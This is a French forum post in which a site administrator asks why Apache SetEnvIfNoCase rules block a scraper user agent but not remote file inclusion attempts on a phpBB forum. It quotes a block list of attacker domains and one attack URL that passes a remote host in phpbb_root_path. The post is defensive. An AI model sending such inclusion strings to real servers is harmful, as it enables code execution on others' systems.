config apache.conf pour blocker des url avec filtres?
1 message • Page 1 sur 1
Consultez la formation au référencement naturel Google de WebRankInfo / Ranking Metrics
config apache.conf pour blocker des url avec filtres?
Bonjour,
J'essaye de blocker des "abuse filter" qui pleuvent en ce moment sur un de mes sites via le forum phpbb. J'utilise mon fichier apache.conf car j'aimerais le générailiser à tous les sites présents sur le serveur.
voici la syntaxe que j'utilise et qui fonctionne avec le user_agent, mais pas avec Request_URI :
SetEnvIfNoCase user-agent "Website eXtractor" getout
SetEnvIfNoCase Request_URI pulze\.us getout
SetEnvIfNoCase Request_URI cpanelturkiye\.com getout
<Files ~ "^.*$">
order allow,deny
Allow from all
deny from env=getout
</Files>
DOnc les hosts se connectant avec le user agent "Website eXtractor" sont bien bloqués mais ceux qui envoient une url du type test.php?phpbb_root_path=http://pulze.us/tmp/a? ne le sont pas... Est ce que j'ai loupé quelque chose au niveau syntaxe?
Merci
J'essaye de blocker des "abuse filter" qui pleuvent en ce moment sur un de mes sites via le forum phpbb. J'utilise mon fichier apache.conf car j'aimerais le générailiser à tous les sites présents sur le serveur.
voici la syntaxe que j'utilise et qui fonctionne avec le user_agent, mais pas avec Request_URI :
SetEnvIfNoCase user-agent "Website eXtractor" getout
SetEnvIfNoCase Request_URI pulze\.us getout
SetEnvIfNoCase Request_URI cpanelturkiye\.com getout
<Files ~ "^.*$">
order allow,deny
Allow from all
deny from env=getout
</Files>
DOnc les hosts se connectant avec le user agent "Website eXtractor" sont bien bloqués mais ceux qui envoient une url du type test.php?phpbb_root_path=http://pulze.us/tmp/a? ne le sont pas... Est ce que j'ai loupé quelque chose au niveau syntaxe?
Merci
1 message • Page 1 sur 1
Formation recommandée sur ce thème :
Formation Référencement naturel Google : apprenez une méthode efficace pour optimiser à fond le référencement naturel dans Google de façon durable... Formation animée par Olivier Duffez et Fabien Facériès, experts en référencement naturel.
Tous les détails sur le site Ranking Metrics : programme, prix, dates et lieux, inscription en ligne.
Lectures recommandées sur ce thème :
- Afficher le PageRank en entier dans Firefox (barre d'outils Google)
- Comment voir facilement les liens nofollow dans Firefox
- Sortie de GoogleStats v2.01
- Suite de l'article sur le fichier .htaccess : l'URL rewriting
- Domaine favori - URL canonique
- Séminaire URL Rewriting et sites dynamiques
- Article sur le fichier .htaccess
- Exalead crée une interface pour iPhone et iPod Touch
- Gérer les comptes et profils Google Analytics
- Hébergement de projets open source sur Google Code
Consultez la description détaillée des produits ou services de Google suivants : Google Web Toolkit